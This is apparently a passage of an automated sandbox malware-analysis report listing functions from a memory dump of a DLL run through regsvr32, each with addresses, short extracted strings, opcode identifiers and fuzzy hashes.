                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Wcl
                                                                    • API String ID: 0-2623992880
                                                                    • Opcode ID: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                    • Instruction ID: 6785441b261b06c1a3a09f49601167733b22bb672c53a20dcfeae34723d14519
                                                                    • Opcode Fuzzy Hash: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                    • Instruction Fuzzy Hash: DCB17BB990364DCFCB68CF78D58A59D7BF1AF64308F204119FC259A266D3B0D629CB48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180029888 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ws8
                                                                    • API String ID: 0-2196714860
                                                                    • Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                    • Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
                                                                    • Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                    • Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180017908 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: p/g
                                                                    • API String ID: 0-1786412500
                                                                    • Opcode ID: 12e0429f3d25b53aa03a660b5e037e54bcd2ac93df657abae010b2d02fa62e0c
                                                                    • Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
                                                                    • Opcode Fuzzy Hash: 12e0429f3d25b53aa03a660b5e037e54bcd2ac93df657abae010b2d02fa62e0c
                                                                    • Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000131C Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %
                                                                    • API String ID: 0-3714942587
                                                                    • Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                    • Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
                                                                    • Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                    • Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000D8C4 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: A.}
                                                                    • API String ID: 0-2880059976
                                                                    • Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                    • Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
                                                                    • Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                    • Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180001D68 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0#
                                                                    • API String ID: 0-456275806
                                                                    • Opcode ID: 2a5e92d38432702302bb854991be2d1fec0b328a8259ee1ce7fe1531fc30a302
                                                                    • Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
                                                                    • Opcode Fuzzy Hash: 2a5e92d38432702302bb854991be2d1fec0b328a8259ee1ce7fe1531fc30a302
                                                                    • Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180008CA0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: n)
                                                                    • API String ID: 0-1227437150
                                                                    • Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                    • Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
                                                                    • Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                    • Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001EB30 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: H&0
                                                                    • API String ID: 0-1691334370
                                                                    • Opcode ID: 176f3dafecf3041be65652fa330368668244bab9b7972e65e66ffc3ed07b0be6
                                                                    • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                    • Opcode Fuzzy Hash: 176f3dafecf3041be65652fa330368668244bab9b7972e65e66ffc3ed07b0be6
                                                                    • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018002870C Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <+o
                                                                    • API String ID: 0-2035106886
                                                                    • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                    • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                    • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                    • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180015388 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2d
                                                                    • API String ID: 0-3866551247
                                                                    • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                    • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                    • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                    • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800250CC Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ZF{;
                                                                    • API String ID: 0-2351138993
                                                                    • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                    • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                    • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                    • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180011834 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: o^
                                                                    • API String ID: 0-3380573087
                                                                    • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                    • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                    • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                    • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180017CE4 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8N
                                                                    • API String ID: 0-1657423088
                                                                    • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                    • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                    • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                    • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180002178 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: J3n
                                                                    • API String ID: 0-3694000235
                                                                    • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                    • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                    • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                    • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001F7C0 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c&A
                                                                    • API String ID: 0-649646960
                                                                    • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                    • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                    • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                    • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800029BC Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (3
                                                                    • API String ID: 0-2570504824
                                                                    • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                    • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                    • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                    • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018002C7B4 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: [r\^
                                                                    • API String ID: 0-4041245994
                                                                    • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                    • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                    • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                    • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180019FDC Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X
                                                                    • API String ID: 0-1684620495
                                                                    • Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                    • Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
                                                                    • Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                    • Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180002790 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: [[x
                                                                    • API String ID: 0-2553898450
                                                                    • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                    • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                    • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                    • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001E960 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: g\&
                                                                    • API String ID: 0-1994035986
                                                                    • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                    • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                    • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                    • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000338C Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X
                                                                    • API String ID: 0-1684620495
                                                                    • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                    • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                    • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                    • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800095DC Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GfMu
                                                                    • API String ID: 0-241548529
                                                                    • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                    • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                    • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                    • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000F9E8 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: k|
                                                                    • API String ID: 0-998972391
                                                                    • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                    • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                    • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                    • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001D950 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: wz_
                                                                    • API String ID: 0-2163964638
                                                                    • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                    • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                    • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                    • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000580C Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: {?Q
                                                                    • API String ID: 0-927583641
                                                                    • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                    • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                    • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                    • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180021510 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: |}6\
                                                                    • API String ID: 0-3074799505
                                                                    • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                    • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                    • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                    • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001FA38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3&a
                                                                    • API String ID: 0-537350193
                                                                    • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                    • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                    • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                    • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001435C Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
